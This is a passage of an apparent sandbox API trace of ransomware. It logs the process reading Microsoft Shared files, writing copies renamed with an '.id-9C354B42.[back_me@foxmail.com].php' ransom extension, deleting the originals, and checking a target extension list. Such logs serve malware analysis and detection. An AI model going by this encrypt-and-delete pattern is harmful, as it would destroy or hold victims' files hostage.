lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x2180, lpOverlapped=0x0) returned 1 [0043.215] ReadFile (in: hFile=0x1a8, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.215] WriteFile (in: hFile=0x20c, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0043.215] SetEndOfFile (hFile=0x20c) returned 1 [0043.216] CloseHandle (hObject=0x20c) returned 1 [0043.216] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.216] SetEndOfFile (hFile=0x1a8) returned 1 [0043.217] CloseHandle (hObject=0x1a8) returned 1 [0043.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.217] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 1 [0043.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.217] lstrlenW (lpString=".doc") returned 4 [0043.217] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString=".docx") returned 5 [0043.218] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0043.218] lstrlenW (lpString=".pdf") returned 4 [0043.218] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString=".xls") returned 4 [0043.218] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString=".xlsx") returned 5 [0043.218] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0043.218] lstrlenW (lpString=".ppt") returned 4 [0043.218] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.218] lstrlenW (lpString=".zip") returned 4 [0043.218] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.218] lstrlenW (lpString=".rar") returned 4 [0043.218] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString=".bz2") returned 4 [0043.218] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString=".7z") returned 3 [0043.218] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.218] lstrlenW (lpString=".dbf") returned 4 [0043.218] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.218] lstrlenW (lpString=".1cd") returned 4 [0043.218] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.218] lstrlenW (lpString=".jpg") returned 4 [0043.218] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.218] lstrlenW (lpString=".doc") returned 4 [0043.218] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.218] lstrlenW (lpString=".docx") returned 5 [0043.218] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0043.219] lstrlenW (lpString=".pdf") returned 4 [0043.219] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.219] lstrlenW (lpString=".xls") returned 4 [0043.219] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.219] lstrlenW (lpString=".xlsx") returned 5 [0043.219] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0043.219] lstrlenW (lpString=".ppt") returned 4 [0043.219] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.219] lstrlenW (lpString=".zip") returned 4 [0043.219] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.219] lstrlenW (lpString=".rar") returned 4 [0043.219] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.219] lstrlenW (lpString=".bz2") returned 4 [0043.219] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.219] lstrlenW (lpString=".7z") returned 3 [0043.219] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.219] lstrlenW (lpString=".dbf") returned 4 [0043.219] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.219] lstrlenW (lpString=".1cd") returned 4 [0043.219] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML") returned 76 [0043.219] lstrlenW (lpString=".jpg") returned 4 [0043.219] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.219] lstrcmpiW (lpString1=".TXT", lpString2=".php") returned 1 [0043.219] lstrlenW (lpString="METCONV.TXT") returned 11 [0043.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0043.243] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1183416) returned 1 [0043.243] CloseHandle (hObject=0x1a0) returned 1 [0043.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 0x20 [0043.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0043.244] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.244] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.244] GetLastError () returned 0x0 [0043.244] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0043.267] WriteFile (in: hFile=0x198, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0043.916] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x20ec8, lpOverlapped=0x0) returned 1 [0043.926] WriteFile (in: hFile=0x198, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x20ed0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x20ed0, lpOverlapped=0x0) returned 1 [0043.932] ReadFile (in: hFile=0x1a0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.932] WriteFile (in: hFile=0x198, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.932] SetEndOfFile (hFile=0x198) returned 1 [0043.933] CloseHandle (hObject=0x198) returned 1 [0043.944] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.945] SetEndOfFile (hFile=0x1a0) returned 1 [0043.946] CloseHandle (hObject=0x1a0) returned 1 [0043.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.946] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt")) returned 1 [0043.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.947] lstrlenW (lpString=".doc") returned 4 [0043.947] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0043.947] lstrlenW (lpString=".docx") returned 5 [0043.947] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0043.947] lstrlenW (lpString=".pdf") returned 4 [0043.947] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0043.947] lstrlenW (lpString=".xls") returned 4 [0043.947] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0043.947] lstrlenW (lpString=".xlsx") returned 5 [0043.947] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0043.947] lstrlenW (lpString=".ppt") returned 4 [0043.947] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0043.947] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0043.947] lstrlenW (lpString=".zip") returned 4 [0043.947] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0043.947] lstrlenW (lpString=".rar") returned 4 [0044.290] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0044.290] lstrlenW (lpString=".bz2") returned 4 [0044.290] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0044.290] lstrlenW (lpString=".7z") returned 3 [0044.291] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0044.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.291] lstrlenW (lpString=".dbf") returned 4 [0044.291] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0044.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.291] lstrlenW (lpString=".1cd") returned 4 [0044.291] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0044.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.291] lstrlenW (lpString=".jpg") returned 4 [0044.291] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0044.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.291] lstrlenW (lpString=".doc") returned 4 [0044.291] lstrcmpiW (lpString1=".doc", lpString2=".TXT") returned -1 [0044.291] lstrlenW (lpString=".docx") returned 5 [0044.291] lstrcmpiW (lpString1=".docx", lpString2="V.TXT") returned -1 [0044.291] lstrlenW (lpString=".pdf") returned 4 [0044.291] lstrcmpiW (lpString1=".pdf", lpString2=".TXT") returned -1 [0044.291] lstrlenW (lpString=".xls") returned 4 [0044.291] lstrcmpiW (lpString1=".xls", lpString2=".TXT") returned 1 [0044.291] lstrlenW (lpString=".xlsx") returned 5 [0044.291] lstrcmpiW (lpString1=".xlsx", lpString2="V.TXT") returned -1 [0044.291] lstrlenW (lpString=".ppt") returned 4 [0044.291] lstrcmpiW (lpString1=".ppt", lpString2=".TXT") returned -1 [0044.291] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.291] lstrlenW (lpString=".zip") returned 4 [0044.291] lstrcmpiW (lpString1=".zip", lpString2=".TXT") returned 1 [0044.291] lstrlenW (lpString=".rar") returned 4 [0044.291] lstrcmpiW (lpString1=".rar", lpString2=".TXT") returned -1 [0044.291] lstrlenW (lpString=".bz2") returned 4 [0044.291] lstrcmpiW (lpString1=".bz2", lpString2=".TXT") returned -1 [0044.291] lstrlenW (lpString=".7z") returned 3 [0044.291] lstrcmpiW (lpString1=".7z", lpString2="TXT") returned -1 [0044.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.292] lstrlenW (lpString=".dbf") returned 4 [0044.292] lstrcmpiW (lpString1=".dbf", lpString2=".TXT") returned -1 [0044.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.292] lstrlenW (lpString=".1cd") returned 4 [0044.292] lstrcmpiW (lpString1=".1cd", lpString2=".TXT") returned -1 [0044.292] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 68 [0044.292] lstrlenW (lpString=".jpg") returned 4 [0044.292] lstrcmpiW (lpString1=".jpg", lpString2=".TXT") returned -1 [0044.292] lstrcmpiW (lpString1=".jpg", lpString2=".php") returned -1 [0044.292] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0044.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0044.888] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=6406) returned 1 [0044.888] CloseHandle (hObject=0x1b0) returned 1 [0044.888] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0044.888] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.888] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.888] lstrlenW (lpString=".doc") returned 4 [0044.888] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0044.888] lstrlenW (lpString=".docx") returned 5 [0044.888] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0044.888] lstrlenW (lpString=".pdf") returned 4 [0044.889] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0044.889] lstrlenW (lpString=".xls") returned 4 [0044.889] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0044.889] lstrlenW (lpString=".xlsx") returned 5 [0044.889] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0044.889] lstrlenW (lpString=".ppt") returned 4 [0044.889] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0044.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.889] lstrlenW (lpString=".zip") returned 4 [0044.889] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0044.889] lstrlenW (lpString=".rar") returned 4 [0044.889] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0044.889] lstrlenW (lpString=".bz2") returned 4 [0044.889] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0044.889] lstrlenW (lpString=".7z") returned 3 [0044.889] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0044.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.889] lstrlenW (lpString=".dbf") returned 4 [0044.889] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0044.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.889] lstrlenW (lpString=".1cd") returned 4 [0044.889] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0044.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.889] lstrlenW (lpString=".jpg") returned 4 [0044.889] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0044.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.889] lstrlenW (lpString=".doc") returned 4 [0044.889] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0044.889] lstrlenW (lpString=".docx") returned 5 [0044.889] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0044.889] lstrlenW (lpString=".pdf") returned 4 [0044.889] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0044.889] lstrlenW (lpString=".xls") returned 4 [0044.890] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0044.890] lstrlenW (lpString=".xlsx") returned 5 [0044.890] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0044.890] lstrlenW (lpString=".ppt") returned 4 [0044.890] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0044.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.890] lstrlenW (lpString=".zip") returned 4 [0044.890] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0044.890] lstrlenW (lpString=".rar") returned 4 [0044.890] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0044.890] lstrlenW (lpString=".bz2") returned 4 [0044.890] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0044.890] lstrlenW (lpString=".7z") returned 3 [0044.890] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0044.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.890] lstrlenW (lpString=".dbf") returned 4 [0044.890] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0044.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.890] lstrlenW (lpString=".1cd") returned 4 [0044.890] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0044.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 74 [0044.890] lstrlenW (lpString=".jpg") returned 4 [0044.890] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0044.890] lstrcmpiW (lpString1=".wmf", lpString2=".php") returned 1 [0044.890] lstrlenW (lpString="grid_(cm).wmf") returned 13 [0044.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0044.891] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2920) returned 1 [0044.891] CloseHandle (hObject=0x1b0) returned 1 [0044.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf")) returned 0x20 [0044.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.891] lstrlenW (lpString=".doc") returned 4 [0044.891] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0044.891] lstrlenW (lpString=".docx") returned 5 [0044.891] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0044.891] lstrlenW (lpString=".pdf") returned 4 [0044.891] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0044.891] lstrlenW (lpString=".xls") returned 4 [0044.891] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0044.891] lstrlenW (lpString=".xlsx") returned 5 [0044.891] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0044.891] lstrlenW (lpString=".ppt") returned 4 [0044.891] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0044.891] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.891] lstrlenW (lpString=".zip") returned 4 [0044.891] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0044.891] lstrlenW (lpString=".rar") returned 4 [0044.891] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString=".bz2") returned 4 [0044.892] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString=".7z") returned 3 [0044.892] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0044.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.892] lstrlenW (lpString=".dbf") returned 4 [0044.892] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.892] lstrlenW (lpString=".1cd") returned 4 [0044.892] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.892] lstrlenW (lpString=".jpg") returned 4 [0044.892] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.892] lstrlenW (lpString=".doc") returned 4 [0044.892] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString=".docx") returned 5 [0044.892] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0044.892] lstrlenW (lpString=".pdf") returned 4 [0044.892] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString=".xls") returned 4 [0044.892] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0044.892] lstrlenW (lpString=".xlsx") returned 5 [0044.892] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0044.892] lstrlenW (lpString=".ppt") returned 4 [0044.892] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.892] lstrlenW (lpString=".zip") returned 4 [0044.892] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0044.892] lstrlenW (lpString=".rar") returned 4 [0044.892] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0044.892] lstrlenW (lpString=".bz2") returned 4 [0044.892] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0044.893] lstrlenW (lpString=".7z") returned 3 [0044.893] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0044.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.893] lstrlenW (lpString=".dbf") returned 4 [0044.893] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0044.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 